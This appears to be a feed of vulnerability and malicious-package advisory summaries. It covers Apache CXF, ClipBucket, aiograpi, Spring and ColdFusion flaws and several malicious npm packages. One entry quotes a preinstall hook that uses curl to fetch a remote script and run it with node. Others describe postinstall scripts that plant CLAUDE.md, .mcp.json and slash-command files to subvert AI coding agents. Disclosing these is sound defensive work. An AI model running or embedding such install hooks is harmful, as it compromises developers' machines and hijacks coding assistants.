EUVD-2026-36394

Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band OOB external entity resolution. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue...

PT-2026-48844

Name of the Vulnerable Software and Affected Versions Apache CXF versions prior to 4.2.2 Apache CXF versions prior to 4.1.7 Description The EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the required JAXP hardening configurations. This allows for...

EulerOS Virtualization 2.13.1 : expat (EulerOS-SA-2026-2369)

According to the versions of the expat packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory...

Governing Claude Enterprise in Environments Where Inline Controls Can't Go

TrendAI™ integrates the Claude Compliance API into TrendAI Vision One™ through two collectors that bring AI-aware visibility and detection to Claude Enterprise usage: one keeps all data inside the environment, while the other feeds TrendAI Vision One™ for deeper correlation and compliance...

CVE-2026-42846

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - 140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly...

EUVD-2026-36367

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - 140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly...

CVE-2026-45175

creationtimestamp| type| source ---|---|--- 2026-06-11 22:19:28+00:00| seen| https://bsky.app/profile/cve.skyfleet.blue/post/3mo2b2ibw7o23...

CVE-2026-47157 aiograpi: Unsafe signup challenge path handling

aiograpi is an asynchronous Instagram API for Python. aiograpi versions before 0.9.10 accepted server-supplied signup challenge paths and used them to build request URLs before validating that the paths were relative Instagram API paths. If an attacker can influence a challenge response, for...

CVE-2026-47157

aiograpi (Python) before 0.9.10 accepted server-supplied signup challenge paths and built request URLs before validating that the paths were relative Instagram API paths. An attacker who can influence a challenge response (e.g., on a local network, via DNS, or via a proxy) could cause challenge h...

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

Malicious code in theta-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware bbfa69ed41fd4cfb88637f2f5765174105f8c4eb42d4f433fdd05d642e664fa9 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-5639 Malicious code in @tt-aem-tt4a/shared-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 817c1920ad6f83b25d8fd32b77999376a6ad3b5448e93e7b0b66cce72ec4dac0 The OpenSSF Package Analysis project identified '@tt-aem-tt4a/shared-components' @ 10.0.0 npm as malicious. It is considered malicious because: ...

Malicious code in clsx-tailwind (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6e1efb9d7593baede89024227d99cc6ca9fc0c86e1f0faf8dd78560174cf1b39 Package advertises a trivial Tailwind class-name merger a 5-line cn helper but its main entry dist/index.js unconditionally requires...

MAL-2026-5629 Malicious code in sass-formats (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5ccda832d10cb642350129278ae1fc341d3be8b8302ddbf9bdcfc15eeeb6eae8 The package name sass-formats is one character-edit away from the popular sass-formatter package and reuses its original author field "author": "Syle...

Vulnerabilities in Adobe ColdFusion

Adobe has addressed several vulnerabilities in Adobe ColdFusion versions 2023.19, 2025.8, and earlier versions. These vulnerabilities include improper input validation, which allows arbitrary code to be executed without user interaction. There is also a path traversal vulnerability that enables...

MAL-2026-5597 Malicious code in 0x2ai-demo9 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bb3fa91a9457ef11dc837c301fef1b22dbe1b19f00400215d853958726e1d055 On npm install, the package's postinstall script writes .mcp.json, CLAUDE.md, and a .claude/commands/0x2ai-boot.md slash-command file into the...

CVE-2026-40998

Jaxp13XPathTemplate evaluated XPath expressions for StreamSource and SAXSource inputs using a code path that parsed attacker-controlled XML with the JDK's default DocumentBuilderFactory behavior instead of Spring's hardened parser configuration. Applications that evaluate XPath against untrusted...

MAL-2026-5591 Malicious code in 0x2ai-demo4 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1893e8cd8ff38936ad388208f98e30cc64a6b1126062e2ff716004338feedf8c On npm install, the package's postinstall script unconditionally copies its payload/ tree into the user's project directory process.env.INITCWD,...

MAL-2026-5594 Malicious code in 0x2ai-demo7x (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c7e956073a7db6057e4d42af462dba0299152ca992c113d74c715e90574d0efb On npm install, scripts/postinstall.cjs copies the package's payload/ tree into the installer's project root process.env.INITCWD, placing...

Malicious code in ai-sdk-helpers (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 501daa3c8b2c9c2609dc60fd90ae59710a603ae56fa5dcc867d24913889c5413 [email protected] is a typosquat impersonating the Vercel AI SDK ecosystem homepage ai-sdk.guide, author 'AI SDK Guide '. On npm install,...